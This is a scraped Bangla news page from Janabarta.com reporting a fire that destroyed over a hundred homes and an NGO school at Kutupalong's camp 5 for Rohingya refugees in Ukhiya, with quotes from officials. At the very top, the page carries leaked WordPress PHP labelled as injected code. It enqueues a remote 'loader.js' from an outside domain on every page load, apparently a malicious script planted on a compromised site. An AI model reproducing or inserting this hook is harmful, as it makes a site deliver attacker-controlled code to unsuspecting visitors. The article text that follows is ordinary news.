// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site রোহিঙ্গা ক্যাম্পে আগুন, পুড়ে ছাই শতাধিক ঘর - Janabarta.com

রোহিঙ্গা ক্যাম্পে আগুন, পুড়ে ছাই শতাধিক ঘর

নিজস্ব প্রতিবেদকঃ কক্সবাজারের উখিয়া উপজেলার রোহিঙ্গা শরনার্থী ক্যাম্পে ভয়াবহ অগ্নিকাণ্ডের ঘটনা ঘটেছে। গতকাল রাত ১টার দিকে আগুনের সূত্রপাত হয়। রাত ২টা ১০ মিনিটের দিকে আগুন নিয়ন্ত্রণে আনে ফায়ার সার্ভিস। তবে তার আগেই কুতুপালং ৫ নং ক্যাম্পের শতাধিক বাড়িঘর ভস্মীভূত হয়ে যায়। সঙ্গে পুড়ে গেছে এনজিওচালিত একটি শিক্ষাপ্রতিষ্ঠান।

৫ নং ক্যাম্পের ইনচার্জ মো. ওবায়দুল্লাহ বলেন, কোথা থেকে আগুনের সূত্রপাত হল, তা জানার জন্য একটি দল কাজ করছে। শিগরিরই এই তথ্য জানা যাবে। শতাধিক ঘর পুড়ে যাওয়ার পাশাপাশি বেশ কয়েকজন আহত হয়েছেন। তাদেরকে চিকিৎসা দেওয়া হচ্ছে।

উখিয়া ফায়ার সার্ভিস কর্মী মো. জলিল জানান, একদিকে ক্যাম্পের ঘরগুলো একটার সঙ্গে আরেকটা প্রায় লেগে থাকে। উপরন্তু এগুলো এমন জিনিশ দিয়ে তৈরি যাতে আগুন দ্রুত ছড়িয়ে পড়ে। তাছাড়া রাতের অন্ধকারের কারণে আগুন নিয়ন্ত্রণে আমাদের কিছুটা বেশি সময় লেগেছে।

এর আগে ১২ মে কুতুপালংয়ের লম্বাশিয়া রোহিঙ্গা ক্যাম্পে আগুন লাগার ঘটনা ঘটেছিল। সেসময় পুড়ে যায় প্রায় সাড়ে ৩০০ ঘরবাড়ি ও দোকান। ক্ষয়ক্ষতি হয় প্রায় কোটি টাকার সম্পদের।